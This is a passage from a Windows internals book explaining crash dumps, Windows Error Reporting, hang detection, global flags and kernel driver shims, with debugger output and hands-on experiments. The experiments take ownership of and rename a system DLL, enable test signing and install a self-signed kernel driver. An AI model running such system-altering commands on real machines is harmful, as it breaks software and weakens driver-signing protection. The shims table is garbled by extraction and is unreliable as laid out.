constraints, is unable to keep a copy of the crash dump file, an event is
written to the System event log indicating that the dump file was deleted, as
shown in Figure 10-41. This behavior can be overridden by creating the
DWORD registry value
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\AlwaysKeepMe
moryDump and setting it to 1, in which case Windows always keeps a crash
dump, regardless of the amount of free disk space.
Figure 10-41 Dump file deletion event log entry.
EXPERIMENT: Viewing dump file information
Each crash dump file contains a dump header that describes the
stop code and its parameters, the type of system the crash occurred
on (including version information), and a list of pointers to
important kernel-mode structures required during analysis. The
dump header also contains the type of crash dump that was written
and any information specific to that type of dump. The
.dumpdebug debugger command can be used to display the dump
header of a crash dump file. For example, the following output is
from a crash of a system that was configured for an automatic
dump:
Click here to view code image
0: kd> .dumpdebug
----- 64 bit Kernel Bitmap Dump Analysis - Kernel address
space is available,
User address space may not be available.
DUMP_HEADER64:
MajorVersion 0000000f
MinorVersion 000047ba
KdSecondaryVersion 00000002
DirectoryTableBase 00000000`006d4000
PfnDataBase ffffe980`00000000
PsLoadedModuleList fffff800`5df00170
PsActiveProcessHead fffff800`5def0b60
MachineImageType 00008664
NumberProcessors 00000003
BugCheckCode 000000e2
BugCheckParameter1 00000000`00000000
BugCheckParameter2 00000000`00000000
BugCheckParameter3 00000000`00000000
BugCheckParameter4 00000000`00000000
KdDebuggerDataBlock fffff800`5dede5e0
SecondaryDataState 00000000
ProductType 00000001
SuiteMask 00000110
Attributes 00000000
BITMAP_DUMP:
DumpOptions 00000000
HeaderSize 16000
BitmapSize 9ba00
Pages 25dee
KiProcessorBlock at fffff800`5e02dac0
3 KiProcessorBlock entries:
fffff800`5c32f180 ffff8701`9f703180 ffff8701`9f3a0180
The .enumtag command displays all secondary dump data
stored within a crash dump (as shown below). For each callback of
secondary data, the tag, the length of the data, and the data itself (in
byte and ASCII format) are displayed. Developers can use
Debugger Extension APIs to create custom debugger extensions to
also read secondary dump data. (See the “Debugging Tools for
Windows” help file for more information.)
Click here to view code image
{E83B40D2-B0A0-4842-ABEA71C9E3463DD1} - 0x100 bytes
46 41 43 50 14 01 00 00 06 98 56 52 54 55 41 4C
FACP......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54
MICROSFT....MSFT
53 52 41 54 A0 01 00 00 02 C6 56 52 54 55 41 4C
SRAT......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54
MICROSFT....MSFT
57 41 45 54 28 00 00 00 01 22 56 52 54 55 41 4C
WAET(...."VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54
MICROSFT....MSFT
41 50 49 43 60 00 00 00 04 F7 56 52 54 55 41 4C
APIC`.....VRTUAL
...
Crash dump generation
Phase 1 of the system boot process allows the I/O manager to check the
configured crash dump options by reading the
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl registry key. If a
dump is configured, the I/O manager loads the crash dump driver
(Crashdmp.sys) and calls its entry point. The entry point transfers back to the
I/O manager a table of control functions, which are used by the I/O manager
for interacting with the crash dump driver. The I/O manager also initializes
the secure encryption needed by the Secure Kernel to store the encrypted
pages in the dump. One of the control functions in the table initializes the
global crash dump system. It gets the physical sectors (file extent) where the
page file is stored and the volume device object associated with it.
The global crash dump initialization function obtains the miniport driver
that manages the physical disk in which the page file is stored. It then uses
the MmLoadSystemImageEx routine to make a copy of the crash dump driver
and the disk miniport driver, giving them their original names prefixed by the
dump_ string. Note that this implies also creating a copy of all the drivers
imported by the miniport driver, as shown in the Figure 10-42.
Figure 10-42 Kernel modules copied for use to generate and write a crash
dump file.
The system also queries the DumpFilters value for any filter drivers that
are required for writing to the volume, an example being Dumpfve.sys, the
BitLocker Drive Encryption Crashdump Filter driver. It also collects
information related to the components involved with writing a crash dump—
including the name of the disk miniport driver, the I/O manager structures
that are necessary to write the dump, and the map of where the paging file is
on disk—and saves two copies of the data in dump-context structures. The
system is ready to generate and write a dump using a safe, noncorrupted path.
Indeed, when the system crashes, the crash dump driver
(%SystemRoot%\System32\Drivers\Crashdmp.sys) verifies the integrity of
the two dump-context structures obtained at boot by performing a memory
comparison. If there’s not a match, it does not write a crash dump because
doing so would likely fail or corrupt the disk. Upon a successful verification
match, Crashdmp.sys, with support from the copied disk miniport driver and
any required filter drivers, writes the dump information directly to the sectors
on disk occupied by the paging file, bypassing the file system driver and
storage driver stack (which might be corrupted or even have caused the
crash).
Note
Because the page file is opened early during system startup for crash
dump use, most crashes that are caused by bugs in system-start driver
initialization result in a dump file. Crashes in early Windows boot
components such as the HAL or the initialization of boot drivers occur too
early for the system to have a page file, so using another computer to
debug the startup process is the only way to perform crash analysis in
those cases.
During the boot process, the Session Manager (Smss.exe) checks the
registry value HKLM\SYSTEM\CurrentControlSet\Control\Session
Manager\Memory Management\ExistingPageFiles for a list of existing page
files from the previous boot. (See Chapter 5 of Part 1 for more information
on page files.) It then cycles through the list, calling the function
SmpCheckForCrashDump on each file present, looking to see whether it
contains crash dump data. It checks by searching the header at the top of each
paging file for the signature PAGEDUMP or PAGEDU64 on 32-bit or 64-bit
systems, respectively. (A match indicates that the paging file contains crash
dump information.) If crash dump data is present, the Session Manager then
reads a set of crash parameters from the
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl registry key,
including the DumpFile value that contains the name of the target dump file
(typically %SystemRoot%\Memory.dmp, unless configured otherwise).
Smss.exe then checks whether the target dump file is on a different volume
than the paging file. If so, it checks whether the target volume has enough
free disk space (the size required for the crash dump is stored in the dump
header of the page file) before truncating the paging file to the size of the
crash data and renaming it to a temporary dump file name. (A new page file
will be created later when the Session Manager calls the NtCreatePagingFile
function.) The temporary dump file name takes the format DUMPxxxx.tmp,
where xxxx is the current low-word value of the system’s tick count (The
system attempts 100 times to find a nonconflicting value.) After renaming the
page file, the system removes both the hidden and system attributes from the
file and sets the appropriate security descriptors to secure the crash dump.
Next, the Session Manager creates the volatile registry key
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\MachineCrash
and stores the temporary dump file name in the value DumpFile. It then
writes a DWORD to the TempDestination value indicating whether the dump
file location is only a temporary destination. If the paging file is on the same
volume as the destination dump file, a temporary dump file isn’t used
because the paging file is truncated and directly renamed to the target dump
file name. In this case, the DumpFile value will be that of the target dump
file, and TempDestination will be 0.
Later in the boot, Wininit checks for the presence of the MachineCrash
key, and if it exists, launches the Windows Fault Reporting process
(Werfault.exe) with the -k -c command-line switches (the k flag indicates
kernel error reporting, and the c flag indicates that the full or kernel dump
should be converted to a minidump). WerFault reads the TempDestination
and DumpFile values. If the TempDestination value is set to 1, which
indicates a temporary file was used, WerFault moves the temporary file to its
target location and secures the target file by allowing only the System
account and the local Administrators group access. WerFault then writes the
final dump file name to the FinalDumpFileLocation value in the
MachineCrash key. These steps are shown in Figure 10-43.
Figure 10-43 Crash dump file generation.
To provide more control over where the dump file data is written to—for
example, on systems that boot from a SAN or systems with insufficient disk
space on the volume where the paging file is configured—Windows also
supports the use of a dedicated dump file that is configured in the
DedicatedDumpFile and DumpFileSize values under the
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl registry key.
When a dedicated dump file is specified, the crash dump driver creates the
dump file of the specified size and writes the crash data there instead of to
the paging file. If no DumpFileSize value is given, Windows creates a
dedicated dump file using the largest file size that would be required to store
a complete dump. Windows calculates the required size as the size of the
total number of physical pages of memory present in the system plus the size
required for the dump header (one page on 32-bit systems, and two pages on
64-bit systems), plus the maximum value for secondary crash dump data,
which is 256 MB. If a full or kernel dump is configured but there is not
enough space on the target volume to create the dedicated dump file of the
required size, the system falls back to writing a minidump.
Kernel reports
After the WerFault process is started by Wininit and has correctly generated
the final dump file, WerFault generates the report to send to the Microsoft
Online Crash Analysis site (or, if configured, an internal error reporting
server). Generating a report for a kernel crash is a procedure that involves the
following:
1.
If the type of dump generated was not a minidump, it extracts a
minidump from the dump file and stores it in the default location of
%SystemRoot%\Minidump, unless otherwise configured through the
MinidumpDir value in the
HKLM\SYSTEM\CurrentControlSet\Control\CrashControl key.
2.
It writes the name of the minidump files to
HKLM\SOFTWARE\Microsoft\Windows\Windows Error
Reporting\KernelFaults\Queue.
3.
It adds a command to execute WerFault.exe
(%SystemRoot%\System32\WerFault.exe) with the –k –rq flags (the
rq flag specifies to use queued reporting mode and that WerFault
should be restarted) to
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
so that WerFault is executed during the first user’s logon to the
system for purposes of actually sending the error report.
When the WerFault utility executes during logon, as a result of having
configured itself to start, it launches itself again using the –k –q flags (the q
flag on its own specifies queued reporting mode) and terminates the previous
instance. It does this to prevent the Windows shell from waiting on WerFault
by returning control to RunOnce as quickly as possible. The newly launched
WerFault.exe checks the
HKLM\SOFTWARE\Microsoft\Windows\Windows Error
Reporting\KernelFaults\Queue key to look for queued reports that may have
been added in the previous dump conversion phase. It also checks whether
there are previously unsent crash reports from previous sessions. If there are,
WerFault.exe generates two XML-formatted files:
■ The first contains a basic description of the system, including the
operating system version, a list of drivers installed on the machine,
and the list of devices present in the system.
■ The second contains metadata used by the OCA service, including the
event type that triggered WER and additional configuration
information, such as the system manufacturer.
WerFault then sends a copy of the two XML files and the minidump to
Microsoft OCA server, which forwards the data to a server farm for
automated analysis. The server farm’s automated analysis uses the same
analysis engine that the Microsoft kernel debuggers use when you load a
crash dump file into them. The analysis generates a bucket ID, which is a
signature that identifies a particular crash type.
Process hang detection
Windows Error reporting is also used when an application hangs and stops
work because of some defect or bug in its code. An immediate effect of an
application hanging is that it would not react to any user interaction. The
algorithm used for detecting a hanging application depends on the application
type: the Modern application stack detects that a Centennial or UWP
application is hung when a request sent from the HAM (Host Activity
Manager) is not processed after a well-defined timeout (usually 30 seconds);
the Task manager detects a hung application when an application does not
reply to the WM_QUIT message; Win32 desktop applications are considered
not responding and hung when a foreground window stops to process GDI
messages for more than 5 seconds.
Describing all the hung detection algorithms is outside the scope of this
book. Instead, we will consider the most likely case of a classical Win32
desktop application that stopped to respond to any user input. The detection
starts in the Win32k kernel driver, which, after the 5-second timeout, sends a
message to the DwmApiPort ALPC port created by the Desktop Windows
Manager (DWM.exe). The DWM processes the message using a complex
algorithm that ends up creating a “ghost” window on top of the hanging
window. The ghost redraws the window’s original content, blurring it out and
adding the (Not Responding) string in the title. The ghost window processes
GDI messages through an internal message pump routine, which intercepts
the close, exit, and activate messages by calling the ReportHang routine
exported by the Windows User Mode Crash Reporting DLL (faultrep.dll).
The ReportHang function simply builds a WERSVC_REPORT_HANG
message and sends it to the WER service to wait for a reply.
The WER service processes the message and initializes the Hang reporting
by reading settings values from the
HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs root
registry key. In particular, the MaxHangrepInstances value is used to indicate
how many hanging reports can be generated in the same time (the default
number is eight if the value does not exist), while the TerminationTimeout
value specifies the time that needs to pass after WER has tried to terminate
the hanging process before considering the entire system to be in hanging
situation (10 seconds by default). This situation can happen for various
reasons—for example, an application has an active pending IRP that is never
completed by a kernel driver. The WER service opens the hanging process
and obtains its token, and some other basic information. It then creates a
shared memory section object to store them (similar to user application
crashes; in this case, the shared section has a name: Global\<Random
GUID>).
A WerFault process is spawned in a suspended state using the faulting
process’s token and the -h command-line switch (which is used to specify to
generate a report for a hanging process). Unlike with user application
crashes, a snapshot of the hanging process is taken from the WER service
using a full SYSTEM token by invoking the the PssNtCaptureSnapshot API
exported in Ntdll. The snapshot’s handle is duplicated in the suspended
WerFault process, which is resumed after the snapshot has been successfully
acquired. When the WerFault starts, it signals an event indicating that the
report generation has started. From this stage, the original process can be
terminated. Information for the report is grabbed from the cloned process.
The report for a hanging process is similar to the one acquired for a
crashing process: The WerFault process starts by querying the value of the
Debugger registry value located in the global
HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs root
registry key. If there is a valid debugger, it is launched and attached to the
original hanging process. In case the Disable registry value is set to 1, the
procedure is aborted and the WerFault process exits without generating any
report. Otherwise, WerFault opens the shared memory section, validates it,
and grabs all the information previously saved by the WER service. The
report is initialized by using the WerReportCreate function exported in
WER.dll and used also for crashing processes. The dialog box for a hanging
process (shown in Figure 10-44) is always displayed independently on the
WER configuration. Finally, the WerReportSubmit function (exported in
WER.dll) is used to generate all the files for the report (including the
minidump file) similarly to user applications crashes (see the “Crash report
generation” section earlier in this chapter). The report is finally sent to the
Online Crash Analysis server.
Figure 10-44 The Windows Error Reporting dialog box for hanging
applications.
After the report generation is started and the
WERSVC_HANG_REPORTING_STARTED message is returned to DWM,
WER kills the hanging process using the TerminateProcess API. If the
process is not terminated in an expected time frame (generally 10 seconds,
but customizable through the TerminationTimeout setting as explained
earlier), the WER service relaunches another WerFault instance running
under a full SYSTEM token and waits another longer timeout (usually 60
seconds but customizable through the LongTerminationTimeout setting). If
the process is not terminated even by the end of the longer timeout, WER has
no other chances than to write an ETW event on the Application event log,
reporting the impossibility to terminate the process. The ETW event is shown
in Figure 10-45. Note that the event description is misleading because WER
hasn’t been able to terminate the hanging application.
Figure 10-45 ETW error event written to the Application log for a
nonterminating hanging application.
Global flags
Windows has a set of flags stored in two systemwide global variables named
NtGlobalFlag and NtGlobalFlag2 that enable various internal debugging,
tracing, and validation support in the operating system. The two system
variables are initialized from the registry key
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager in the values
GlobalFlag and GlobalFlag2 at system boot time (phase 0 of the NT kernel
initialization). By default, both registry values are 0, so it’s likely that on
your systems, you’re not using any global flags. In addition, each image has a
set of global flags that also turn on internal tracing and validation code
(although the bit layout of these flags is slightly different from the
systemwide global flags).
Fortunately, the debugging tools contain a utility named Gflags.exe that
you can use to view and change the system global flags (either in the registry
or in the running system) as well as image global flags. Gflags has both a
command-line and a GUI interface. To see the command-line flags, type
gflags /?. If you run the utility without any switches, the dialog box shown in
Figure 10-46 is displayed.
Figure 10-46 Setting system debugging options with GFlags.
Flags belonging to the Windows Global flags variables can be split in
different categories:
■ Kernel flags are processed directly by various components of the NT
kernel (the heap manager, exceptions, interrupts handlers, and so on).
■ User flags are processed by components running in user-mode
applications (usually Ntdll).
■ Boot-only flags are processed only when the system is starting.
■ Per-image file global flags (which have a slightly different meaning
than the others) are processed by the loader, WER, and some other
user-mode components, depending on the user-mode process context
in which they are running.
The names of the group pages shown by the GFlags tool is a little
misleading. Kernel, boot-only, and user flags are mixed together in each
page. The main difference is that the System Registry page allows the user to
set global flags on the GlobalFlag and GlobalFlag2 registry values, parsed at
system boot time. This implies that eventual new flags will be enabled only
after the system is rebooted. The Kernel Flags page, despite its name, does
not allow kernel flags to be applied on the fly to a live system. Only certain
user-mode flags can be set or removed (the enable page heap flag is a good
example) without requiring a system reboot: the Gflags tool sets those flags
using the NtSetSystemInformation native API (with the
SystemFlagsInformation information class). Only user-mode flags can be set
in that way.
EXPERIMENT: Viewing and setting global flags
You can use the !gflag kernel debugger command to view and set
the state of the NtGlobalFlag kernel variable. The !gflag command
lists all the flags that are enabled. You can use !gflag -? to get the
entire list of supported global flags. At the time of this writing, the
!gflag extension has not been updated to display the content of the
NtGlobalFlag2 variable.
The Image File page requires you to fill in the file name of an executable
image. Use this option to change a set of global flags that apply to an
individual image (rather than to the whole system). The page is shown in
Figure 10-47. Notice that the flags are different from the operating system
ones shown in Figure 10-46. Most of the flags and the setting available in the
Image File and Silent Process Exit pages are applied by storing new values in
a subkey with the same name as the image file (that is, notepad.exe for the
case shown in Figure 10-47) under the
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options registry key (also known as the IFEO key). In particular,
the GlobalFlag (and GlobalFlag2) value represents a bitmask of all the
available per-image global flags.
Figure 10-47 Setting per-image global flags with GFlags.
When the loader initializes a new process previously created and loads all
the dependent libraries of the main base executable (see Chapter 3 of Part 1
for more details about the birth of a process), the system processes the per-
image global flags. The LdrpInitializeExecutionOptions internal function
opens the IFEO key based on the name of the base image and parses all the
per-image settings and flags. In particular, after the per-image global flags
are retrieved from the registry, they are stored in the NtGlobalFlag (and
NtGlobalFlag2) field of the process PEB. In this way, they can be easily
accessed by any image mapped in the process (including Ntdll).
Most of the available global flags are documented at
https://docs.microsoft.com/en-us/windows-
hardware/drivers/debugger/gflags-flag-table.
EXPERIMENT: Troubleshooting Windows loader
issues
In the “Watching the image loader” experiment in Chapter 3 of Part
1, you used the GFlags tool to display the Windows loader runtime
information. That information can be useful for understanding why
an application does not start at all (without returning any useful
error information). You can retry the same experiment on
mspaint.exe by renaming the Msftedit.dll file (the Rich Text Edit
Control library) located in %SystemRoot%\system32. Indeed, Paint
depends on that DLL indirectly. The Msftedit library is loaded
dynamically by MSCTF.dll. (It is not statically linked in the Paint
executable.) Open an administrative command prompt window and
type the following commands:
Click here to view code image
cd /d c:\windows\system32
takeown /f msftedit.dll
icacls msftedit.dll /grant Administrators:F
ren msftedit.dll msftedit.disabled
Then enable the loader snaps using the Gflags tool, as specified
in the “Watching the image loader” experiment. If you start
mspaint.exe using Windbg, the loader snaps would be able to
highlight the problem almost immediately, returning the following
text:
Click here to view code image
142c:1e18 @ 00056578 - LdrpInitializeNode - INFO: Calling
init routine 00007FFC79258820 for
DLL "C:\Windows\System32\MSCTF.dll"142c:133c @ 00229625 -
LdrpResolveDllName - ENTER: DLL
name: .\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status:
0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name:
C:\Program Files\Debugging Tools
for Windows (x64)\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status:
0xc0000135
142c:133c @ 00229625 - LdrpResolveDllName - ENTER: DLL name:
C:\Windows\system32\MSFTEDIT.DLL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status:
0xc0000135
. . .
C:\Users\test\AppData\Local\Microsoft\WindowsApps\MSFTEDIT.D
LL
142c:133c @ 00229625 - LdrpResolveDllName - RETURN: Status:
0xc0000135
142c:133c @ 00229625 - LdrpSearchPath - RETURN: Status:
0xc0000135
142c:133c @ 00229625 - LdrpProcessWork - ERROR: Unable to
load DLL: "MSFTEDIT.DLL", Parent
Module: "(null)", Status: 0xc0000135
142c:133c @ 00229625 - LdrpLoadDllInternal - RETURN: Status:
0xc0000135
142c:133c @ 00229625 - LdrLoadDll - RETURN: Status:
0xc0000135
Kernel shims
New releases of the Windows operating system can sometime bring issues
with old drivers, which can have difficulties in operating in the new
environment, producing system hangs or blue screens of death. To overcome
the problem, Windows 8.1 introduced a Kernel Shim engine that’s able to
dynamically modify old drivers, which can continue to run in the new OS
release. The Kernel Shim engine is implemented mainly in the NT kernel.
Driver’s shims are registered through the Windows Registry and the Shim
Database file. Drivers’ shims are provided by shim drivers. A shim driver
uses the exported KseRegisterShimEx API to register a shim that can be
applied to target drivers that need it. The Kernel Shim engine supports mainly
two kinds of shims applied to devices or drivers.
Shim engine initialization
In early OS boot stages, the Windows Loader, while loading all the boot-
loaded drivers, reads and maps the driver compatibility database file, located
in %SystemRoot%\apppatch\Drvmain.sdb (and, if it exists, also in the
Drvpatch.sdb file). In phase 1 of the NT kernel initialization, the I/O manager
starts the two phases of the Kernel Shim engine initialization. The NT kernel
copies the binary content of the database file(s) in a global buffer allocated
from the paged pool (pointed by the internal global KsepShimDb variable). It
then checks whether Kernel Shims are globally disabled. In case the system
has booted in Safe or WinPE mode, or in case Driver verifier is enabled, the
shim engine wouldn’t be enabled. The Kernel Shim engine is controllable
also using system policies or through the
HKLM\System\CurrentControlSet\Control\Compatibility\DisableFlags
registry value. The NT kernel then gathers low-level system information
needed when applying device shims, like the BIOS information and OEM ID,
by checking the System Fixed ACPI Descriptor Table (FADT). The shim
engine registers the first built-in shim provider, named DriverScope, using
the KseRegisterShimEx API. Built-in shims provided by Windows are listed
in Table 10-21. Some of them are indeed implemented in the NT kernel
directly and not in any external driver. DriverScope is the only shim
registered in phase 0.
Table 10-21 Windows built-in kernel shims
Shi
m
Na
me
GUID
Purpose
M
o
d
ul
e
Driv
erSc
ope
{BC04AB4
5-EA7E-
4A11-
A7BB-
977615F4C
AAE}
The driver scope shim is used to collect
health ETW events for a target driver. Its
hooks do nothing other than writing an ETW
event before or after calling the original
nonshimmed callbacks.
N
T
ke
rn
el
Vers
ion
Lie
{3E28B2D
1-E633-
408C-
8E9B-
2AFA6F47
FCC3}
(7.1)
(47712F55-
BD93-
43FC-
9248-
B9A83710
066E} (8)
{21C4FB5
8-D477-
4839-
A7EA-
AD6918FB
C518}
(8.1)
The version lie shim is available for
Windows 7, 8, and 8.1. The shim
communicates a previous version of the OS
when required by a driver in which it is
applied.
N
T
ke
rn
el
Skip
Driv
erU
nloa
{3E8C2CA
6-34E2-
4DE6-
8A1E-
The shim replaces the driver’s unload
routine with one that doesn’t do anything
except logging an ETW event.
N
T
ke
rn
d
9692DD3E
316B}
el
Zero
Pool
{6B847429
-C430-
4682-
B55F-
FD11A7B5
5465}
Replace the ExAllocatePool API with a
function that allocates the pool memory and
zeroes it out.
N
T
ke
rn
el
Clea
rPCI
DBit
s
{B4678DF
F-BD3E-
46C9-
923B-
B5733483
B0B3}
Clear the PCID bits when some antivirus
drivers are mapping physical memory
referred by CR3.
N
T
ke
rn
el
Kas
pers
ky
{B4678DF
F-CC3E-
46C9-
923B-
B5733483
B0B3}
Shim created for specific Kaspersky filter
drivers for masking the real value of the
UseVtHardware registry value, which could
have caused bug checks on old versions of
the antivirus.
N
T
ke
rn
el
Mem
cpy
{8A2517C
1-35D6-
4CA8-
9EC8-
98A127628
91B}
Provides a safer (but slower) memory copy
implementation that always zeroes out the
destination buffer and can be used with
device memory.
N
T
ke
rn
el
Kern
elPa
dSec
tions
Over
{4F55C0D
B-73D3-
43F2-9723-
8A9C7F79
D39D}
Prevents discardable sections of any kernel
module to be freed by the memory manager
and blocks the loading of the target driver
(where the shim is applied).
N
T
ke
rn
el
ride
NDI
S
Shim
{49691313
-1362-
4e75-8c2a-
2dd72928e
ba5}
NDIS version compatibility shim (returns
6.40 where applied to a driver).
N
di
s.
sy
s
SrbS
him
{434ABAF
D-08FA-
4c3d-
A88D-
D09A88E2
AB17}
SCSI Request Block compatibility shim that
intercepts the
IOCTL_STORAGE_QUERY_PROPERTY.
St
or
p
or
t.s
ys
Devi
ceId
Shim
{0332ec62-
865a-4a39-
b48f-
cda6e855f4
23}
Compatibility shim for RAID devices.
St
or
p
or
t.s
ys
ATA
Devi
ceId
Shim
{26665d57
-2158-
4e4b-a959-
c917d03a0
d7e}
Compatibility shim for serial ATA devices.
St
or
p
or
t.s
ys
Blue
toot
h
Filte
r
Pow
er
{6AD90D
AD-C144-
4E9D-
A0CF-
AE9FCB90
1EBD}
Compatibility shim for Bluetooth filter
drivers.
Bt
h
p
or
t.s
ys
shim
Usb
Shim
{fd8fd62e-
4d94-4fc7-
8a68-
bff7865a70
6b}
Compatibility shim for old Conexant USB
modem.
U
sb
d.
sy
s
Noki
a
Usbs
er
Filte
r
Shim
{7DD6099
7-651F-
4ECB-
B893-
BEC8050F
3BD7}
Compatibility shim for Nokia Usbser filter
drivers (used by Nokia PC Suite).
U
sb
d.
sy
s
A shim is internally represented through the KSE_SHIM data structure
(where KSE stands for Kernel Shim Engine). The data structure includes the
GUID, the human-readable name of the shim, and an array of hook collection
(KSE_HOOK_COLLECTION data structures). Driver shims support different
kinds of hooks: hooks on functions exported by the NT kernel, HAL, and by
driver libraries, and on driver’s object callback functions. In phase 1 of its
initialization, the Shim Engine registers the Microsoft-Windows-Kernel-
ShimEngine ETW provider (which has the {0bf2fb94-7b60-4b4d-9766-
e82f658df540} GUID), opens the driver shim database, and initializes the
remaining built-in shims implemented in the NT kernel (refer to Table 10-
21).
To register a shim (through KseRegisterShimEx), the NT kernel performs
some initial integrity checks on both the KSE_SHIM data structure, and each
hook in the collection (all the hooks must reside in the address space of the
calling driver). It then allocates and fills a
KSE_REGISTERED_SHIM_ENTRY data structure which, as the name
implies, represents the registered shim. It contains a reference counter and a
pointer back to the driver object (used only in case the shim is not
implemented in the NT kernel). The allocated data structure is linked in a
global linked list, which keeps track of all the registered shims in the system.
The shim database
The shim database (SDB) file format was first introduced in the old Windows
XP for Application Compatibility. The initial goal of the file format was to
store a binary XML-style database of programs and drivers that needed some
sort of help from the operating system to work correctly. The SDB file has
been adapted to include kernel-mode shims. The file format describes an
XML database using tags. A tag is a 2-byte basic data structure used as
unique identifier for entries and attributes in the database. It is made of a 4-bit
type, which identifies the format of the data associated with the tag, and a 12-
bit index. Each tag indicates the data type, size, and interpretation that
follows the tag itself. An SDB file has a 12-byte header and a set of tags. The
set of tags usually defines three main blocks in the shim database file:
■ The INDEX block contains index tags that serve to fast-index
elements in the database. Indexes in the INDEX block are stored in
increasing order. Therefore, searching an element in the indexes is a
fast operation (using a binary search algorithm). For the Kernel Shim
engine, the elements are stored in the INDEXES block using an 8-
byte key derived from the shim name.
■ The DATABASE block contains top-level tags describing shims,
drivers, devices, and executables. Each top-level tag contains children
tags describing properties or inner blocks belonging to the root entity.
■ The STRING TABLE block contains strings that are referenced by
lower-level tags in the DATABASE block. Tags in the DATABASE
block usually do not directly describe a string but instead contain a
reference to a tag (called STRINGREF) describing a string located in
the string table. This allows databases that contain a lot of common
strings to be small in size.
Microsoft has partially documented the SDB file format and the APIs used
to read and write it at https://docs.microsoft.com/en-
us/windows/win32/devnotes/application-compatibility-database. All the SDB
APIs are implemented in the Application Compatibility Client Library
(apphelp.dll).
Driver shims
The NT memory manager decides whether to apply a shim to a kernel driver
at its loading time, using the KseDriverLoadImage function (boot-loaded
drivers are processed by the I/O manager, as discussed in Chapter 12). The
routine is called at the correct time of a kernel-module life cycle, before
either Driver Verifier, Import Optimization, or Kernel Patch protection are
applied to it. (This is important; otherwise, the system would bugcheck.) A
list of the current shimmed kernel modules is stored in a global variable. The
KsepGetShimsForDriver routine checks whether a module in the list with the
same base address as the one being loaded is currently present. If so, it means
that the target module has already been shimmed, so the procedure is aborted.
Otherwise, to determine whether the new module should be shimmed, the
routine checks two different sources:
■ Queries the “Shims” multistring value from a registry key named as
the module being loaded and located in the
HKLM\System\CurrentControlSet\Control\Compatibility\Driver root
key. The registry value contains an array of shims’ names that would
be applied to the target module.
■ In case the registry value for a target module does not exist, parses the
driver compatibility database file, looking for a KDRIVER tag
(indexed by the INDEX block), which has the same name as the
module being loaded. If a driver is found in the SDB file, the NT
kernel performs a comparison of the driver version
(TAG_SOURCE_OS stored in the KDRIVER root tag), file name,
and path (if the relative tags exist in the SDB), and of the low-level
system information gathered at engine initialization time (to
determine if the driver is compatible with the system). In case any of
the information does not match, the driver is skipped, and no shims
are applied. Otherwise, the shim names list is grabbed from the
KSHIM_REF lower-level tags (which is part of the root KDRIVER).
The tags are reference to the KSHIMs located in the SDB database
block.
If one of the two sources yields one or more shims names to be applied to
the target driver, the SDB file is parsed again with the goal to validate that a
valid KSHIM descriptor exists. If there are no tags related to the specified
shim name (which means that no shim descriptor exists in the database), the
procedure is interrupted (this prevents an administrator from applying
random non-Microsoft shims to a driver). Otherwise, an array of
KSE_SHIM_INFO data structure is returned to KsepGetShimsForDriver.
The next step is to determine if the shims described by their descriptors
have been registered in the system. To do this, the Shim engine searches into
the global linked list of registered shims (filled every time a new shim is
registered, as explained previously in the “Shim Engine initialization”
section). If a shim is not registered, the shim engine tries to load the driver
that provides it (its name is stored in the MODULE child tag of the root
KSHIM entry) and tries again. When a shim is applied for the first time, the
Shim engine resolves the pointers of all the hooks described by the
KSE_HOOK_COLLECTION data structures’ array belonging to the
registered shim (KSE_SHIM data structure). The shim engine allocates and
fills a KSE_SHIMMED_MODULE data structure representing the target
module to be shimmed (which includes the base address) and adds it to the
global list checked in the beginning.
At this stage, the shim engine applies the shim to the target module using
the internal KsepApplyShimsToDriver routine. The latter cycles between each
hook described by the KSE_HOOK_COLLECTION array and patches the
import address table (IAT) of the target module, replacing the original
address of the hooked functions with the new ones (described by the hook
collection). Note that the driver’s object callback functions (IRP handlers)
are not processed at this stage. They are modified later by the I/O manager
before the DriverInit routine of the target driver is called. The original
driver’s IRP callback routines are saved in the Driver Extension of the target
driver. In that way, the hooked functions have a simple way to call back into
the original ones when needed.
EXPERIMENT: Witnessing kernel shims
While the official Microsoft Application Compatibility Toolkit
distributed with the Windows Assessment and Deployment Kit
allows you to open, modify, and create shim database files, it does
not work with system database files (identified through to their
internal GUIDs), so it won’t be able to parse all the kernel shims
that are described by the drvmain.sdb database. Multiple third-party
SDB parsers exist. One in particular, called SDB explorer, is freely
downloadable from https://ericzimmerman.github.io/.
In this experiment, you get a peek at the drvmain system
database file and apply a kernel shim to a test driver, ShimDriver,
which is available in this book’s downloadable resources. For this
experiment, you need to enable test signing (the ShimDriver is
signed with a test self-signed certificate):
1.
Open an administrative command prompt and type the
following command:
Click here to view code image
bcdedit /set testsigning on
2.
Restart your computer, download SDB Explorer from its
website, run it, and open the drvmain.sdb database located
in %SystemRoot%\apppatch.
3.
From the SDB Explorer main window, you can explore the
entire database file, organized in three main blocks:
Indexes, Databases, and String table. Expand the
DATABASES root block and scroll down until you can see
the list of KSHIMs (they should be located after the
KDEVICEs). You should see a window similar to the
following:
4.
You will apply one of the Version lie shims to our test
driver. First, you should copy the ShimDriver to the
%SystemRoot%\System32\Drivers. Then you should install
it by typing the following command in the administrative
command prompt (it is assumed that your system is 64-bit):
Click here to view code image
sc create ShimDriver type= kernel start= demand error=
normal binPath= c:\
Windows\System32\ShimDriver64.sys
5.
Before starting the test driver, you should download and run
the DebugView tool, available in the Sysinternals website
(https://docs.microsoft.com/en-
us/sysinternals/downloads/debugview). This is necessary
because ShimDriver prints some debug messages.
6.
Start the ShimDriver with the following command:
sc start shimdriver
7.
Check the output of the DebugView tool. You should see
messages like the one shown in the following figure. What
you see depends on the Windows version in which you run
